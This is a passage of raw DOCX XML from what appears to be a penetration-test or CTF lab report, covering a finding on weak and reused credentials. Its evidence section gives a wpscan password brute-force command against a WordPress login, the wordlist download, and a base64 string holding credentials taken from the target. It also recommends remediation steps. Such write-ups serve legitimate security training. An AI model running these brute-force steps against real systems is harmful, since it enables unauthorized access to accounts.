    <w:p w14:paraId="6B681405">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>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5420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7EAA9">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the first key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D861D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="285559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5420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD01A2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C11DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBD697F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An attacker can leverage exposed files and information to gain unauthorized access, pivot further into the system, and potentially execute arbitrary commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0517F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9D1DAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>High-Level Remediation Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15695B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019F0645">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Restrict access to sensitive directories and files  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFEE6A">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Implement proper access controls and authentication  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A1D920">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Remove unnecessary files from the web root and avoid exposing internal resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4D327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF4440E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49587BF9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 Finding 2 : Weak Credentials / Credential Reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C32A94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201CBF56">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Risk Rating</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 xml:space="preserve">MEDIUM  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C042D9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A74762">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E288395">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7188C8C3">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557C85A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA3578D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials discovered in application files </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlists were reused to authenticate to system services (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web login). This allowed an attacker to gain shell access as a low-privileged user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0EAAC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7E0C99">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BF3D01">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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Credentials obtained from application content or wordlists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilizing wpscan to brute-force the password. The wordlist was downloaded to my kali utilizing: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15017EA0">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color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.49.144.81/fsocity" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.49.144.81/fsocity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.dic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47436A5D">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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Retrieve base64 hash (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ZWxsaW90OkVSMjgtMDY1Mgo=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>) from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /license.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EBC76D">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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The wordlist was cleaned using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “sort fsocity.dic | uniq &gt; fsocity_clean.txt “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8BEB21">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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan -- url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.48.152.10/wp-login" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.48.152.10/wp-login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php --passwords fsocity_clean.txt --usernames Elliot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B565B45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Retrieve the credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101421B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Successful login to the system using these credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576E9733">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Base64 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C72BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="508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265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB0EA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Screenshot of base64 decription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D78C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="200" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="19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5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651CF88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0AF147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DD8DEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the password brute-force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F806A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="285559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5420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
